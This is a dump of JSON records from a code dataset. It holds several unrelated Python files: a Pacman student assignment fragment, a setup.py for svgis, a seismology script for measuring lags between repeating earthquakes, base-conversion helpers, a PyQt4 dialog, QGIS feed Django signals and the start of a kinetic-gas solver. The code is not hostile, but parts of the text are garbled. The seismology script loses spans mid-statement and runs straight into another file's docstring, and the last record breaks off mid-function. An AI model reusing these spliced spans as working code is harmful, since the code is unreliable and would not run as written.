PacMan, typed by the player at the main input prompt,\n and interprets it, storing that direction in the list that represents the PacMan.
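For example, interpretaDirecao('w', lista_pacman) sets lista_pacman[2] to 'CIMA'.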
\n '''\n \n if direcao == 'a':\n lista_pacman[2] = 'ESQUERDA'\n elif direcao == \"s\":\n lista_pacman[2] = 'DIREITA'\n elif direcao == \"w\":\n lista_pacman[2] = 'CIMA'\n elif direcao == \"z\":\n lista_pacman[2] = 'BAIXO'\n \n \n# ======================================================================\ndef rastroFantasmas(lab, lista_fantasmas): \n ''' (matrix, matrix) -> list\n \n Before a ghost moves, checks what is at the position it is about to\n occupy, so that, when the ghost leaves that position, the element that\n was there before (pacdot or empty) can be put back in its place. In this\n program, this function is used inside another function, pacman.movimentaFantasmas.\n '''\n PacDotOuVazio = []\n \n \n for f in range(len(lista_fantasmas)):\n \n linha = lista_fantasmas[f][0]\n coluna = lista_fantasmas[f][1]\n \n if lab[linha][coluna] == '.':\n PacDotOuVazio.append('.')\n \n elif lab[linha][coluna] == ' ':\n PacDotOuVazio.append(' ')\n \n else:\n PacDotOuVazio.append(' ')\n \n return PacDotOuVazio\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"codigos/h/Pedro-Henrique-Tezotto-Delquiaro_2139080_assignsubmission_file_extras.py","file_name":"Pedro-Henrique-Tezotto-Delquiaro_2139080_assignsubmission_file_extras.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"88209584","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of svgis.\n# https://github.com/fitnr/svgis\n\n# Licensed under the GNU General Public License v3 (GPLv3) license:\n# http://opensource.org/licenses/GPL-3.0\n# Copyright (c) 2015, Neil Freeman <contact@fakeisthenewreal.org>\n\nfrom setuptools import setup\n\ntry:\n readme = open('README.rst').read()\nexcept IOError:\n readme = ''\n\nwith open('svgis/__init__.py') as i:\n version = next(r for r in i.readlines() if '__version__' in r).split('=')[1].strip('\"\\' \\n')\n\nsetup(\n name='svgis',\n\n version=version,\n\n description='Draw geodata in SVG',\n\n long_description=readme,\n\n keywords='svg gis geojson shapefile',\n\n author='Neil Freeman',\n\n author_email='contact@fakeisthenewreal.org',\n\n url='https://github.com/fitnr/svgis',\n\n license='GNU General Public License v3 (GPLv3)',\n\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Operating System :: OS Independent',\n ],\n\n packages=['svgis'],\n\n install_requires=[\n 'six>=1.7.3,<2',\n 'click>=6.2,<=6.3',\n 'pyproj>=1.9.5,<1.10',\n 'fiona>=1.6.0,<2.0',\n 'fionautil>=0.5.2,<1.0',\n 'tinycss>=0.3,<0.4',\n 'utm>=0.4.0,<1'\n ],\n\n extras_require={\n 'numpy': [''],\n 'clip': ['shapely>=1.5.7'],\n 'inline': [],\n 'simplify': ['visvalingamwyatt>=0.1.1']\n },\n\n test_suite='tests',\n\n tests_require=['six'],\n\n entry_points={\n 'console_scripts': [\n 'svgis=svgis.cli:main',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"393189978","text":"# example of making a lag file directly from a .sequence file\nimport glob\nimport matplotlib.pyplot as plt\nimport datetime\nimport obspy\nfrom bs4 import 
BeautifulSoup\nimport pandas as pd\nfrom obspy.taup import TauPyModel\nimport numpy as np\nfrom scipy import signal\nimport os\nimport shutil\nimport time\n\ndef get_staloc(net_sta_key,n_date):\n xml_file=glob.glob(n_date+'/'+'stations/'+net_sta_key+'.xml')[0]\n tmpIN1=open(xml_file,'r').read()\n soup=BeautifulSoup(tmpIN1)\n # search both capitalisations: 'a' or 'b' always evaluates to 'a', so the\n # original find_all('longitude' or 'Longitude') only ever matched lowercase\n stlon=float(soup.find_all(['longitude', 'Longitude'])[0].text)\n stlat=float(soup.find_all(['latitude', 'Latitude'])[0].text)\n return(stlon,stlat)\n\n\ndef cal_CCF(data1,data2):\n #calculate normalized CCF, find max CCC and lag idx\n tmpccf=signal.correlate(data1,data2,'full')\n auto1=signal.correlate(data1,data1,'full')\n auto2=signal.correlate(data2,data2,'full')\n tmpccf=tmpccf/np.sqrt(np.max(auto1)*np.max(auto2))\n maxCCC=np.max(tmpccf)\n lag=tmpccf.argmax()\n return(maxCCC,lag)\n\n\ndef cal_CCCscore(ndata,sav_ij_date,sav_CCC):\n CCCscore=np.zeros(ndata)\n for i in range(len(sav_ij_date)):\n CCCscore[sav_ij_date[i][0]]=CCCscore[sav_ij_date[i][0]]+sav_CCC[i]\n CCCscore[sav_ij_date[i][1]]=CCCscore[sav_ij_date[i][1]]+sav_CCC[i]\n return(CCCscore)\n\ndef make_legid(longname):\n sav_legend=[]\n for i in longname:\n sav_legend.append(i.split('/')[-1][:12])\n return(sav_legend)\n\n\ndef evloc(Cat_Date,evdate):\n '''\n Cat_Date:catalog date\n evdate:event datetime that you want to search from the catalog\n '''\n tmp_dt_all=Cat_Date-evdate# see which event it is from the catalog\n junk_time=[] #find which one has the min time difference\n for tmp_dt in tmp_dt_all:\n junk_time.append(np.abs(tmp_dt.total_seconds()))\n idx_cat=np.where(junk_time==np.min(junk_time))[0] #now looking for this event\n eqlon=float(A['eqlon'][idx_cat])\n eqlat=float(A['eqlat'][idx_cat])\n eqdep=float(A['eqdep'][idx_cat])\n return(eqlon,eqlat,eqdep)\n\n\ndef read_summary(summary_path):\n #make summary into a dictionary\n IN1=open(summary_path,'r')\n pairs={}\n for line in IN1.readlines():\n elems=line.split()\n pairs[elems[0]]=line.strip()\n IN1.close()\n return pairs\n\n\n\n#-------------------------------------------------------------------------------#\n#pairsf='pairs_BP0.8-2_wind30s.out' #pairs file from read_log.py\n#pairsf='test_pairs.out' #pairs file from read_log.py\n#pairsf='seq12.inp'\npairsf='/Users/timlin/Documents/Project/TestREPEQ/QQQ/output/logs/QQQ.sequence'\n#pairsf='pairs_BP0.8-2_wind30s_one.out' #pairs file from read_log.py\n#eqpath='/Users/timlin/Documents/Project/EQrequest/Hawaii/Hawaii_ALL/' #where you put your waveform data (EQ folders)\neqpath='/Users/timlin/Documents/Project/TestREPEQ/QQQ/waveforms/' #where you put your waveform data (EQ folders)\nsummary_path='/Users/timlin/Documents/Project/TestREPEQ/QQQ/output/logs/QQQ.summary'\n#catalogpath='/Users/timlin/Documents/Project/EQrequest/Hawaii_ALL_M3.dat' #EQ information\ncatalogpath='/Users/timlin/Documents/Project/TestREPEQ/QQQ/catalog/area1.cat' #EQ information\nA=pd.read_csv(catalogpath,header=None,sep=',',names=['time','eqlat','eqlon','eqdep','eqmag','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x'],skiprows=0)\nCat_Date=pd.to_datetime(A['time'],format='%Y-%m-%dT%H:%M:%S.%fZ')#convert time to Datetime format\n\n\n#filt_freq_HR=(0.8,2) #Yu & Wen, (2012)\n#filt_freq_HR=(0.5,2) #correct P arrival\n#filt_freq_HR=(0.5,2) #\n#filt_freq_HR=(1,4)\n#filt_freq_HR=(0.03,0.1)\n#------------parameters for correcting P arrival-----------------#\nfilt_freq_HR=[(0.5,2),(0.5,2)] #set n-step Pwave corrections\np_wind=[(5,15),(2,4)]#window for Pwave correction. Seconds before (positive!) 
and after the theoretical P arrival\nCCC_thres=0.9 #threshold for repEQ from log file\nCCsta_thres=0.9 #threshold for individual station\nmin_num=1 #at least n stations got this threshold\n#-----------parameters for lag measurement after correcting P arrival----------------#\nL_wind=(20,150) #Total(large window) data to be measured. Seconds before, after corrected P arrival\nfilt_L_wind=(0.5,2) #filter for the large window\nS_wind=6 # n seconds for S(small window) of measurement each time\nmov=0.2 # moving seconds\nsampt=0.005 #interpolate to this interval\nWrite_out=True #write measured lag?\n#-------------------------------------------------------------------------------#\nEQfolders=glob.glob(eqpath+'*')\nEQfolders.sort()\n\nIN1=open(pairsf,'r')\n\nif not(os.path.exists('./lag_INFO')):\n os.makedirs('lag_INFO')\n\n#load summary file into dictionary for later check\nSuminfo=read_summary(summary_path) #Suminfo is a dictionary with p1-p2 keys and p1-p2 measurements content\n\nfor line in IN1.readlines():\n tmpelems_seq=line.split()\n #measure the lag between each other p1 p2 p3 p4......\n for i in range(len(tmpelems_seq)-1):\n for j in range(i+1,len(tmpelems_seq)):\n print('Now dealing with i,j',i,j)\n p1_str=tmpelems_seq[i]\n p2_str=tmpelems_seq[j]\n #convert to datetime\n p1=datetime.datetime.strptime(p1_str,'%Y%m%d%H%M%S')\n p2=datetime.datetime.strptime(p2_str,'%Y%m%d%H%M%S')\n tmp_pair=p1_str+'-'+p2_str # find '20180618133904-20180621043156', for example, in the .summary file\n pair_info=Suminfo[tmp_pair]\n tmpelems=pair_info.split() #tmpelems is, for example ['20180618133904-20180621043156', 'HV.ERZ4', '0.96', 'HV.ERZ2', '0.67']\n '''\n #To check again (or add filter) if they are a repeating EQ pair\n count_CCC=0 #number of station has CCC above the CCC_thres\n for n_cal in range( int((len(tmpelems)-1)/2) ):\n #number of calculations available for p1-p2 pair in the pairsf\n #-1 because the first is p1-p2 id, /2 because 2 elems output/calculation\n sta=tmpelems[2*n_cal+1]\n CCC=float(tmpelems[2*n_cal+2])\n if CCC>=CCC_thres:\n count_CCC+=1\n if count_CCC= p1_wind1_ed ):\n print('window outside the timeseries:W1-p1')\n continue\n p1_D_w1_slice=p1_D_w1.slice(starttime=obspy.UTCDateTime(p1_wind1_st),endtime=obspy.UTCDateTime(p1_wind1_ed))\n #p1_D_w1_slice.plot()\n #cut window for pair#2\n p2_wind1_st=p2+datetime.timedelta(seconds=tP2-p_wind[0][0]) #for pair#2, window#1(large),starttime\n p2_wind1_ed=p2+datetime.timedelta(seconds=tP2+p_wind[0][1])\n if not( p2_D_w1[0].stats.starttime<=p2_wind1_st and p2_D_w1[0].stats.endtime >= p2_wind1_ed ):\n print('window outside the timeseries:W1-p2')\n continue\n p2_D_w1_slice=p2_D_w1.slice(starttime=obspy.UTCDateTime(p2_wind1_st),endtime=obspy.UTCDateTime(p2_wind1_ed))\n #p2_D_w1_slice.plot()\n #detrend them\n #p1_D_w1_slice.detrend()\n #p2_D_w1_slice.detrend()\n '''\n #This is a bug in the interpolate() method, use interpolate(rate,method='linear') instead\n print('maxval:',np.max(np.abs(p1_D_w1_slice[0].data)),np.max(np.abs(p2_D_w1_slice[0].data)))\n if np.max(np.abs(p1_D_w1_slice[0].data))>1e10 or np.max(np.abs(p2_D_w1_slice[0].data))>1e10:\n #p1_D=obspy.read(eqpath+p1_str+'/waveforms/'+sta+'.sac')\n #p2_D=obspy.read(eqpath+p2_str+'/waveforms/'+sta+'.sac')\n #p1_D[0].interpolate(1/sampt)\n #p2_D[0].interpolate(1/sampt)\n tmpD1=p1_D.copy()\n tmpD2=p2_D.copy()\n print(tmpD1[0].stats)\n tmpD1.plot()\n print(tmpD2[0].stats)\n tmpD2.plot()\n time.sleep(1)\n '''\n CCC,lag=cal_CCF(p1_D_w1_slice[0].data,p2_D_w1_slice[0].data)\n
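 # signal.correlate(a, b, 'full') has length len(a)+len(b)-1 with zero lag at index len(b)-1\n # ('midd' below), so (lag - midd)*dt converts the CCF argmax into a time shift in seconds\n 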
midd=(p2_D_w1_slice[0].stats.npts)-1 #length of b?? at this idx, refdata align with target data\n dt=p2_D_w1_slice[0].stats.delta\n shP=(lag-midd)*(dt) #convert to second (dt correction of P)\n print(' 1st correction shift:%s sec'%(shP))\n #if np.abs(shP)>2:\n # plt.plot(p1_D_w1_slice[0].data,'k')\n # plt.plot(p2_D_w1_slice[0].data,'r')\n # plt.show()\n tP2_cor=tP2-shP #tP2_cor=P-shP\n p2_wind1_st=p2+datetime.timedelta(seconds=tP2_cor-p_wind[0][0]) #for pair#2, window#1(large),starttime\n p2_wind1_ed=p2+datetime.timedelta(seconds=tP2_cor+p_wind[0][1])\n if not( p2_D_w1[0].stats.starttime<=p2_wind1_st and p2_D_w1[0].stats.endtime >= p2_wind1_ed ):\n print('window outside the timeseries:W1-p2cor')\n continue\n p2_D_w1_slice=p2_D_w1.slice(starttime=obspy.UTCDateTime(p2_wind1_st),endtime=obspy.UTCDateTime(p2_wind1_ed)) #new slice for corrected p arrival\n if np.abs(shP)>10:\n print('large shift:',shP)\n #plt.figure()\n #plt.plot(p1_D_w1_slice[0].data,'k')\n #plt.plot(p2_D_w1_slice[0].data,'r')\n #plt.title('correction of shP='+str(shP))\n #plt.show()\n #plt.plot(p1_D_w1_slice[0].times(),p1_D_w1_slice[0].data,'k--')\n #plt.plot(p1_D_w1_slice[0].times(),p2_D_w1_slice[0].data,'r--')\n #plt.show()\n #----------------P arrival correction #1 finished, start #2 correction ------------#\n p1_D_w2=p1_D.copy() #copy from the original file since the original data will be used again later. w1:window1\n p2_D_w2=p2_D.copy()\n p1_D_w2[0].detrend('linear')\n p2_D_w2[0].detrend('linear')\n p1_D_w2[0].taper(max_percentage=0.05)\n p2_D_w2[0].taper(max_percentage=0.05)\n #bandpass filter for w#1\n p1_D_w2[0].filter('bandpass',freqmin=filt_freq_HR[0][0],freqmax=filt_freq_HR[0][1],corners=4,zerophase=True)\n p2_D_w2[0].filter('bandpass',freqmin=filt_freq_HR[0][0],freqmax=filt_freq_HR[0][1],corners=4,zerophase=True)\n #cut window for pair#1, in this case, tcs start time=folder name!!! p1=evid in datetime format\n p1_wind2_st=p1+datetime.timedelta(seconds=tP1-p_wind[1][0]) #for pair#1, window#1(large),starttime\n p1_wind2_ed=p1+datetime.timedelta(seconds=tP1+p_wind[1][1]) #endtime\n #print('2.cutting window for p1:',p1_wind2_st,p1_wind2_ed)\n if not( p1_D_w2[0].stats.starttime<=p1_wind2_st and p1_D_w2[0].stats.endtime >= p1_wind2_ed ):\n print('window outside the timeseries:W2-p1')\n continue\n p1_D_w2_slice=p1_D_w2.slice(starttime=obspy.UTCDateTime(p1_wind2_st),endtime=obspy.UTCDateTime(p1_wind2_ed))\n #p1_D_w1_slice.plot()\n #cut window for pair#2\n p2_wind2_st=p2+datetime.timedelta(seconds=tP2_cor-p_wind[1][0]) #for pair#2, window#1(large),starttime\n p2_wind2_ed=p2+datetime.timedelta(seconds=tP2_cor+p_wind[1][1])\n if not( p2_D_w2[0].stats.starttime<=p2_wind2_st and p2_D_w2[0].stats.endtime >= p2_wind2_ed ):\n print('window outside the timeseries:W2-p2')\n continue\n p2_D_w2_slice=p2_D_w2.slice(starttime=obspy.UTCDateTime(p2_wind2_st),endtime=obspy.UTCDateTime(p2_wind2_ed))\n #p2_D_w1_slice.plot()\n #detrend them\n #p1_D_w1_slice.detrend()\n #p2_D_w1_slice.detrend()\n CCC,lag=cal_CCF(p1_D_w2_slice[0].data,p2_D_w2_slice[0].data)\n midd=(p2_D_w2_slice[0].stats.npts)-1 #length of b?? 
at this idx, refdata align with target data\n dt=p2_D_w2_slice[0].stats.delta\n shP=(lag-midd)*(dt) #convert to second (dt correction of P)\n print(' 2nd correction shift:%s sec'%(shP))\n tP2_cor2=tP2_cor-shP #tP2_cor=P-shP , second correction\n p2_wind2_st=p2+datetime.timedelta(seconds=tP2_cor2-p_wind[1][0]) #for pair#2, window#1(large),starttime\n p2_wind2_ed=p2+datetime.timedelta(seconds=tP2_cor2+p_wind[1][1])\n if not( p2_D_w2[0].stats.starttime<=p2_wind2_st and p2_D_w2[0].stats.endtime >= p2_wind2_ed ):\n print('window outside the timeseries:W2-p2cor')\n continue\n p2_D_w2_slice=p2_D_w2.slice(starttime=obspy.UTCDateTime(p2_wind2_st),endtime=obspy.UTCDateTime(p2_wind2_ed)) #new slice for corrected p arrival\n #plt.plot(p1_D_w2_slice[0].times(),p1_D_w2_slice[0].data,'k*')\n #plt.plot(p1_D_w2_slice[0].times(),p2_D_w2_slice[0].data,'r*')\n #plt.close()\n #plt.show()\n #----------------P arrival correction #2 finished------------#\n #----------------make moving window CC-----------------------#\n L_data1=p1_D.copy()\n L_data2=p2_D.copy()\n #clean the large(L) window data\n L_data1[0].detrend('linear')\n L_data2[0].detrend('linear')\n L_data1[0].taper(max_percentage=0.05)\n L_data2[0].taper(max_percentage=0.05)\n L_data1[0].filter('bandpass',freqmin=filt_L_wind[0],freqmax=filt_L_wind[1],corners=4,zerophase=True)\n L_data2[0].filter('bandpass',freqmin=filt_L_wind[0],freqmax=filt_L_wind[1],corners=4,zerophase=True)\n #cut data by P info\n p1_L_wind_st=p1+datetime.timedelta(seconds=tP1-L_wind[0])\n p1_L_wind_ed=p1+datetime.timedelta(seconds=tP1+L_wind[1])\n #print('3.cutting window for calculation',p1_L_wind_st,p1_L_wind_ed)\n if not( L_data1[0].stats.starttime<=p1_L_wind_st and L_data1[0].stats.endtime >= p1_L_wind_ed ):\n print('window outside the timeseries:cut-Lp1')\n continue\n L_data1=L_data1.slice(starttime=obspy.UTCDateTime(p1_L_wind_st),endtime=obspy.UTCDateTime(p1_L_wind_ed))\n p2_L_wind_st=p2+datetime.timedelta(seconds=tP2_cor2-L_wind[0])\n p2_L_wind_ed=p2+datetime.timedelta(seconds=tP2_cor2+L_wind[1])\n if not( L_data2[0].stats.starttime<=p2_L_wind_st and L_data2[0].stats.endtime >= p2_L_wind_ed ):\n print('window outside the timeseries:cut-Lp2')\n continue\n L_data2=L_data2.slice(starttime=obspy.UTCDateTime(p2_L_wind_st),endtime=obspy.UTCDateTime(p2_L_wind_ed))\n #L_data1.plot()\n #L_data2.plot()\n #small window measurements\n #print(L_data1[0].stats.npts,L_data2[0].stats.npts)\n sampl=int(L_data1[0].stats.sampling_rate)\n movpts=int(mov*sampl)\n st=0\n ed=st+S_wind*sampl\n sav_lags=[]\n sav_st=[] #sec for measured window (P at 0sec)\n while ed= 0\n - base is a integer, 1 < base < 17\n Output: number^^power\n Postconditions:\n - returned value is a string containing only digits from input base\n '''\n new_number = '1'\n for index in range (0, power):\n new_number = multiplication(new_number, number, base)\n return (new_number)\n\ndef substitution_method(number, source_base, dest_base):\n '''\n Function converts a number from its source base to destination base\n Input: number, source_base, dest_base\n Preconditions:\n - number is a string containing only digits from source_base\n - source_base and dest_base are natural numbers 2 <= base <= 16\n source_base < dest_base\n Output: new number in destination base\n Postconditions: new number is a string containing only digits from destination base\n '''\n new_number = \"\"\n for index in range (0, len(number)):\n base_power = power(rest_transfer(source_base), len(number) - index - 1, dest_base)\n prod = multiplication(base_power, 
number[index], dest_base)\n new_number = addition(new_number, prod, dest_base)\n return (new_number)\n\ndef successive_division(number, source_base, dest_base):\n '''\n Function converts a number from its source base to destination base\n Input: number, source_base, dest_base\n Preconditions:\n - number is a string containing only digits from source_base\n - source_base and dest-base are natural numbers 2 <= base <= 16\n - source_base > dest_base\n Output: new number in destination base\n Postconditions: new number is a string containing only digits from destination base\n '''\n remainder = division_remainder(number, rest_transfer(dest_base), source_base)\n number = division_quotient(number, rest_transfer(dest_base), source_base)\n new_number = remainder\n while (number != '0'):\n remainder = division_remainder(number, rest_transfer(dest_base), source_base)\n new_number = remainder + new_number\n number = division_quotient(number, rest_transfer(dest_base), source_base)\n return (new_number)\n","sub_path":"Project/conversions.py","file_name":"conversions.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438408069","text":"\nfrom PyQt4 import QtCore, QtGui\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\nclass Ui_StorageDialog(object):\n def setupUi(self, StorageDialog):\n StorageDialog.setObjectName(_fromUtf8(\"StorageDialog\"))\n StorageDialog.resize(231, 184)\n StorageDialog.setStyleSheet(_fromUtf8(\"QWidget, QMenuBar::item, QHeaderView::section {\\n\"\n\" background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\\n\"\n\" stop: 0 #c5d8ef, stop: 1 #89a5c3);\\n\"\n\"}\\n\"\n\"\\n\"\n\"QLabel, QSlider {\\n\"\n\" background-color: transparent;\\n\"\n\"}\"))\n StorageDialog.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))\n self.verticalLayout_2 = QtGui.QVBoxLayout(StorageDialog)\n self.verticalLayout_2.setObjectName(_fromUtf8(\"verticalLayout_2\"))\n self.verticalLayout = QtGui.QVBoxLayout()\n self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetNoConstraint)\n self.verticalLayout.setObjectName(_fromUtf8(\"verticalLayout\"))\n self.namelabel = QtGui.QLabel(StorageDialog)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.namelabel.sizePolicy().hasHeightForWidth())\n self.namelabel.setSizePolicy(sizePolicy)\n self.namelabel.setObjectName(_fromUtf8(\"namelabel\"))\n self.verticalLayout.addWidget(self.namelabel)\n self.horizontalLayout_2 = QtGui.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(_fromUtf8(\"horizontalLayout_2\"))\n self.id = QtGui.QLineEdit(StorageDialog)\n self.id.setEnabled(True)\n self.id.setReadOnly(False)\n self.id.setObjectName(_fromUtf8(\"id\"))\n self.horizontalLayout_2.addWidget(self.id)\n self.verticalLayout.addLayout(self.horizontalLayout_2)\n self.volumelabel = QtGui.QLabel(StorageDialog)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.volumelabel.sizePolicy().hasHeightForWidth())\n self.volumelabel.setSizePolicy(sizePolicy)\n self.volumelabel.setObjectName(_fromUtf8(\"volumelabel\"))\n self.verticalLayout.addWidget(self.volumelabel)\n self.horizontalLayout_3 = QtGui.QHBoxLayout()\n 
self.horizontalLayout_3.setObjectName(_fromUtf8(\"horizontalLayout_3\"))\n self.volume = QtGui.QLineEdit(StorageDialog)\n self.volume.setEnabled(True)\n self.volume.setReadOnly(False)\n self.volume.setObjectName(_fromUtf8(\"volume\"))\n self.horizontalLayout_3.addWidget(self.volume)\n self.verticalLayout.addLayout(self.horizontalLayout_3)\n self.typelabel = QtGui.QLabel(StorageDialog)\n self.typelabel.setObjectName(_fromUtf8(\"typelabel\"))\n self.verticalLayout.addWidget(self.typelabel)\n self.type = QtGui.QLineEdit(StorageDialog)\n self.type.setObjectName(_fromUtf8(\"type\"))\n self.verticalLayout.addWidget(self.type)\n self.horizontalLayout = QtGui.QHBoxLayout()\n self.horizontalLayout.setObjectName(_fromUtf8(\"horizontalLayout\"))\n self.OK = QtGui.QPushButton(StorageDialog)\n self.OK.setObjectName(_fromUtf8(\"OK\"))\n self.horizontalLayout.addWidget(self.OK)\n self.Cancel = QtGui.QPushButton(StorageDialog)\n self.Cancel.setObjectName(_fromUtf8(\"Cancel\"))\n self.horizontalLayout.addWidget(self.Cancel)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.verticalLayout_2.addLayout(self.verticalLayout)\n\n self.retranslateUi(StorageDialog)\n QtCore.QObject.connect(self.OK, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), StorageDialog.accept)\n QtCore.QObject.connect(self.Cancel, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), StorageDialog.reject)\n QtCore.QMetaObject.connectSlotsByName(StorageDialog)\n\n def retranslateUi(self, StorageDialog):\n StorageDialog.setWindowTitle(QtGui.QApplication.translate(\"StorageDialog\", \"Edit Storage\", None, QtGui.QApplication.UnicodeUTF8))\n self.namelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Name:\", None, QtGui.QApplication.UnicodeUTF8))\n self.volumelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Capacity:\", None, QtGui.QApplication.UnicodeUTF8))\n self.typelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Type:\", None, QtGui.QApplication.UnicodeUTF8))\n self.OK.setText(QtGui.QApplication.translate(\"StorageDialog\", \"OK\", None, QtGui.QApplication.UnicodeUTF8))\n self.Cancel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Cancel\", None, QtGui.QApplication.UnicodeUTF8))\n\nfrom . import resources_rc\n","sub_path":"DCGUI/Windows/ui_StorageDialog.py","file_name":"ui_StorageDialog.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255509645","text":"# coding=utf-8\n\"\"\"\"QGIS News app signals\n\n.. 
note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n\"\"\"\n\n__author__ = 'elpaso@itopen.it'\n__date__ = '2019-05-08'\n__copyright__ = 'Copyright 2019, ItOpen'\n\ndef setup_group(sender, **kwargs):\n \"\"\"Create qgisfeedentry_authors group and assign permissions\"\"\"\n\n from django.contrib.auth.models import User, Group, Permission\n group, is_new = Group.objects.get_or_create(name='qgisfeedentry_authors')\n if is_new:\n for perm in ('view_qgisfeedentry', 'add_qgisfeedentry'):\n group.permissions.add(Permission.objects.get(codename=perm))\n\n for staff_user in User.objects.filter(is_staff=True, is_superuser=False):\n group.user_set.add(staff_user)\n\n\n# Post save user visit signals\ndef post_save_user_visit(sender, instance, **kwargs):\n import re\n from django.contrib.gis.geoip2 import GeoIP2\n from qgisfeed.models import QgisUserVisit\n from user_visit.models import UserVisit\n\n g = GeoIP2()\n country_data = {}\n qgis_version = ''\n platform_name = ''\n\n if instance.remote_addr:\n try:\n country_data = g.city(instance.remote_addr)\n except Exception: # geoip2 lookup failed (e.g. AddressNotFound)\n country_data = {}\n\n version_match = re.search('QGIS(.*)\\/', instance.ua_string)\n\n if version_match:\n qgis_version = version_match.group().replace('QGIS', '').strip('/')\n platform_name = instance.ua_string[version_match.end():]\n\n if not platform_name:\n if instance.user_agent:\n platform_name = instance.user_agent.get_os()\n\n QgisUserVisit.objects.get_or_create(\n user_visit=instance,\n location=country_data,\n qgis_version=qgis_version,\n platform=platform_name\n )\n\n UserVisit.objects.filter(pk=instance.pk).update(remote_addr='')\n","sub_path":"qgisfeedproject/qgisfeed/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"620024269","text":"from collections import namedtuple\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.cm as cm\nimport time\nfrom read_starcd import write_tecplot\n\ndef f_maxwell(vx, vy, vz, T, n, ux, uy, uz, Rg):\n \"\"\"Compute Maxwell distribution function on Cartesian velocity mesh\n \n vx, vy, vz - 3d numpy arrays with x, y, z components of velocity mesh\n in each node\n T - float, temperature in K\n n - float, numerical density\n ux, uy, uz - floats, x,y,z components of equilibrium velocity\n Rg - gas constant for specific gas\n \"\"\"\n return n * ((1. / (2. * np.pi * Rg * T)) ** (3. / 2.)) * (np.exp(-((vx - ux)**2 + (vy - uy)**2 + (vz - uz)**2) / (2. * Rg * T)))\n\nclass GasParams:\n Na = 6.02214129e+23 # Avogadro constant\n kB = 1.381e-23 # Boltzmann constant, J / K\n Ru = 8.3144598 # Universal gas constant\n\n def __init__(self, Mol = 40e-3, Pr = 2. / 3., g = 5. / 3., d = 3418e-13):\n self.Mol = Mol\n self.Rg = self.Ru / self.Mol # J / (kg * K) \n self.m = self.Mol / self.Na # kg\n \n self.Pr = Pr\n \n self.C = 144.4\n self.T_0 = 273.11\n self.mu_0 = 2.125e-05\n self.mu_suth = lambda T: self.mu_0 * ((self.T_0 + self.C) / (T + self.C)) * ((T / self.T_0) ** (3. / 2.))\n
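 # empirical power-law fit anchored at the 200 K Sutherland value; the 0.734\n # exponent is kept from the original source (assumed, not derived here)\n self.mu = lambda T: self.mu_suth(200.) 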
 * (T/200.)**0.734\n self.g = g # specific heat ratio\n self.d = d # diameter of molecule\n \nclass Problem:\n def __init__(self, bc_type_list = None, bc_data = None, f_init = None):\n # list of boundary conditions' types\n # according to order in starcd '.bnd' file\n # list of strings\n self.bc_type_list = bc_type_list\n # data for b.c.: wall temperature, inlet n, u, T and so on.\n # list of lists\n self.bc_data = bc_data\n # Function to set initial condition\n self.f_init = f_init\n\ndef set_bc(gas_params, bc_type, bc_data, f, vx, vy, vz, vn):\n \"\"\"Set boundary condition\n \"\"\"\n if (bc_type == 'sym-x'): # symmetry in x\n return f[::-1, :, :]\n elif (bc_type == 'sym-y'): # symmetry in y\n return f[:, ::-1, :]\n elif (bc_type == 'sym-z'): # symmetry in z\n return f[:, :, ::-1]\n elif (bc_type == 'sym'): # zero derivative\n return f[:, :, :]\n elif (bc_type == 'in'): # inlet\n # unpack bc_data\n n = bc_data[0]\n ux = bc_data[1]\n uy = bc_data[2]\n uz = bc_data[3]\n T = bc_data[4]\n return f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg)\n elif (bc_type == 'out'): # outlet\n # unpack bc_data\n n = bc_data[0]\n ux = bc_data[1]\n uy = bc_data[2]\n uz = bc_data[3]\n T = bc_data[4]\n return f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg)\n elif (bc_type == 'wall'): # wall\n # unpack bc_data\n T_w = 